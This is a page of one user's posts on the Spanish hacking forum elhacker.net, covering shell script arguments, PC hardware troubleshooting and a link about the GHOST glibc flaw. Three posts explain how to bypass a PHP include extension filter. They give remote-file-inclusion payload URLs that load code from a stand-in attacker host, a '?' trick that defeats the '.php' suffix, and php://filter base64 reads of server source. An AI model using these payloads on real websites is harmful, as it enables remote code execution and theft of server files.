elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 [16] 17 18 19 20 21 22 23 24
151  Programación / Scripting / Re: Poner parametros en shell en: 2 Febrero 2015, 23:36 pm
$1 = -u  y $2 = usuario
152  Programación / Scripting / Re: Poner parametros en shell en: 2 Febrero 2015, 23:30 pm
Los parametros que le pasas puedes utilizarlos con $1, $2, $3...
153  Programación / Scripting / Re: Poner parametros en shell en: 2 Febrero 2015, 23:18 pm
En que lenguaje?
154  Informática / Hardware / Re: SSD y arranque de 3 minutos o más. en: 2 Febrero 2015, 21:45 pm
Dónde miras lo que consume la gŕafica? Lo que he mirado yo pone 400W.  >:(

Vale, eso es el mínimo necesario, no lo que consume.
155  Informática / Hardware / Re: SSD y arranque de 3 minutos o más. en: 2 Febrero 2015, 21:38 pm
No me hagas mucho caso porque no sé mucho de esto, pero estás seguro de que esa fuente de 500W es suficiente?
156  Informática / Hardware / Re: SSD y arranque de 3 minutos o más. en: 2 Febrero 2015, 21:26 pm
En qué PCI tienes enchufada la gráfica?
157  Seguridad Informática / Seguridad / Re: sobre la entrada GHOST: glibc: buffer overflow en gethostbyname CVE-2015-0235 en: 30 Enero 2015, 12:23 pm
http://foro.elhacker.net/gnulinux/ghost_poc-t428833.0.html
158  Seguridad Informática / Nivel Web / Re: Bypass extensión en filtro include (en la actualidad) en: 29 Enero 2015, 00:43 am
El null byte no se puede utilizar.

Con allow_url_include puedes incluir código php desde una url, por ejemplo:
Código
  1. include "http://atacante/code.txt";

Por lo tanto, no se trata de incluir http://localhost/r/r.php?pagina=text.txt?, sino http://atacante/code.txt y así ejecutar el código del atacante, que podría ser:
Código
  1. echo file_get_contents("archivo.txt");

Para evitar el .php del final basta con poner un ?: http://atacante/code.txt?

Finalmente quedaría así: http://localhost/r/r.php?pagina=http://atacante/code.txt?

Código
  1. include "http://atacante/code.txt?.php";
159  Seguridad Informática / Nivel Web / Re: Bypass extensión en filtro include (en la actualidad) en: 27 Enero 2015, 21:34 pm
Con allow_url_include no puedes usar %00, pero sí poner urls y ejecutar php ajeno, así es fácil ver archivo.txt
Si tienes algún problema con el .php del final, con poner un ?, el resto se ignora:

http://ejemplo.com/ejemplo.txt? quedaría http://ejemplo.com/ejemplo.txt?.php y se ejecuta el código que hay en ejemplo.txt

Con php://filter puedes ver el código de los php en el servidor y buscar otra vulnerabilidad que te deje ver archivo.txt

php://filter/convert.base64-encode/resource=index quedaría php://filter/convert.base64-encode/resource=index.php por lo que no puedes ver el .txt directamente, pero sí los .php.
160  Seguridad Informática / Nivel Web / Re: Bypass extensión en filtro include (en la actualidad) en: 26 Enero 2015, 22:45 pm
Puedes buscar, alternative to null byte en google mismo y sale bastante información. Otra opción es que esté allow_url_include activado, o con php://filter podrías ver los archivos php en base64 por ejemplo y así buscar otra vulnerabilidad.
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 [16] 17 18 19 20 21 22 23 24
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines